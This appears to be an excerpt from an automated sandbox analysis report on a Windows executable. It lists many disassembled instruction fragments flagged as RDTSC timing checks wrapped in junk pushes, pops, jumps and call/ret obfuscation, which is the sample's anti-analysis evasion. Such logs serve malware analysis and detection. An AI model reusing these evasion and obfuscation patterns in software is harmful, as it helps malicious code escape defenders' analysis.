                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D98F6 second address: 5D9946 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F06687C5EEFh 0x00000010 push edi 0x00000011 jns 00007F06687C5EE6h 0x00000017 jmp 00007F06687C5EF7h 0x0000001c pop edi 0x0000001d je 00007F06687C5EEEh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D9946 second address: 5D9954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0668FAD1F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613450 second address: 613456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6135E0 second address: 613602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0668FAD203h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613743 second address: 61375C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EF1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61375C second address: 613767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613767 second address: 613784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06687C5EF9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613A6A second address: 613A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613A70 second address: 613A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613A76 second address: 613A7B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 613A7B second address: 613A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614663 second address: 614667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614667 second address: 614671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614671 second address: 61467D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6146DC second address: 614716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 xor dword ptr [esp], 500E4C00h 0x0000000d mov dword ptr [ebp+122D3C45h], ebx 0x00000013 call 00007F06687C5EE9h 0x00000018 pushad 0x00000019 jmp 00007F06687C5EF2h 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614716 second address: 61471D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61471D second address: 61473F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06687C5EECh 0x00000008 jbe 00007F06687C5EE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F06687C5EECh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61473F second address: 614755 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0668FAD1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614BF3 second address: 614BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614CF6 second address: 614CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614CFA second address: 614D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06687C5EF4h 0x0000000c jmp 00007F06687C5EEEh 0x00000011 popad 0x00000012 push eax 0x00000013 je 00007F06687C5EF2h 0x00000019 jnp 00007F06687C5EECh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 614E6A second address: 614E74 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0668FAD1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6153CE second address: 6153D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6153D2 second address: 6153D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615702 second address: 615706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615794 second address: 6157A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6157A1 second address: 6157A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615865 second address: 61586A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61586A second address: 615880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F06687C5EECh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6158F3 second address: 6158F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6158F8 second address: 615928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F06687C5EF9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, EA74h 0x00000012 push eax 0x00000013 pushad 0x00000014 jbe 00007F06687C5EECh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E34 second address: 615E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E38 second address: 615E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E3E second address: 615E54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0668FAD1FAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E54 second address: 615E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615E58 second address: 615EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D3338h], ebx 0x00000015 push 00000000h 0x00000017 jmp 00007F0668FAD204h 0x0000001c push 00000000h 0x0000001e pushad 0x0000001f mov si, bx 0x00000022 mov ebx, dword ptr [ebp+122D2EECh] 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EA2 second address: 615EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EA6 second address: 615EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EAA second address: 615EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 615EB0 second address: 615EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6167D7 second address: 6167DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6167DD second address: 61685B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0668FAD1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0668FAD1F8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D361Ch], edx 0x0000002d push 00000000h 0x0000002f mov edi, edx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F0668FAD1F8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d xchg eax, ebx 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 js 00007F0668FAD1F6h 0x00000058 popad 0x00000059 jo 00007F0668FAD1F8h 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61685B second address: 61686A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06687C5EE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6182DE second address: 6182E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 617FBE second address: 617FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 618ABF second address: 618AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 619A31 second address: 619A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 619A43 second address: 619A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 619A47 second address: 619A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F06687C5EE8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF532 second address: 5CF563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0668FAD203h 0x00000008 jmp 00007F0668FAD209h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF563 second address: 5CF570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF570 second address: 5CF578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF578 second address: 5CF57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5CF57E second address: 5CF5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0668FAD208h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61BB13 second address: 61BB2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F06687C5EE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F06687C5EE6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61BB2C second address: 61BB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 61FD2E second address: 61FD34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 623B4E second address: 623B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 623B52 second address: 623B65 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F06687C5EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D7E8C second address: 5D7E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 5D7E92 second address: 5D7E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624C46 second address: 624C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624C4C second address: 624C51 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 625E16 second address: 625E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 625E1B second address: 625E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 625E21 second address: 625E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624F00 second address: 624F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 624F05 second address: 624F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 626F54 second address: 626F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 626F5A second address: 626F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 628149 second address: 62816A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F06687C5EF5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6281F1 second address: 6281F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62717D second address: 627187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 627187 second address: 627216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F0668FAD207h 0x0000000f pop ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F0668FAD1F8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0668FAD1F8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov eax, dword ptr [ebp+122D02FDh] 0x00000058 mov dword ptr [ebp+122D24D4h], esi 0x0000005e push FFFFFFFFh 0x00000060 mov di, CD25h 0x00000064 push eax 0x00000065 js 00007F0668FAD213h 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007F0668FAD1F6h 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6283EA second address: 6283EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A080 second address: 62A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6292A1 second address: 6292A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A093 second address: 62A0F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0668FAD1F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D27B4h], edi 0x00000013 je 00007F0668FAD1F9h 0x00000019 mov bx, ax 0x0000001c push 00000000h 0x0000001e mov edi, 72794600h 0x00000023 mov di, B374h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F0668FAD1F8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 mov ebx, 6F64E207h 0x00000048 or dword ptr [ebp+122D2444h], edx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jns 00007F0668FAD1F6h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A0F5 second address: 62A108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 6292A5 second address: 62930E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, 234AC757h 0x0000000f cmc 0x00000010 push dword ptr fs:[00000000h] 0x00000017 movsx edi, di 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F0668FAD1F8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D0DBDh] 0x00000041 mov bl, F1h 0x00000043 push FFFFFFFFh 0x00000045 push eax 0x00000046 movsx edi, di 0x00000049 pop ebx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jo 00007F0668FAD206h 0x00000053 jmp 00007F0668FAD200h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A2A5 second address: 62A2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62A2B1 second address: 62A2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62C0CA second address: 62C0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E1CD second address: 62E1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F0668FAD1F6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 62E1DA second address: 62E20B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06687C5EECh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F06687C5EF0h 0x0000000f jmp 00007F06687C5EF1h 0x00000014 rdtsc
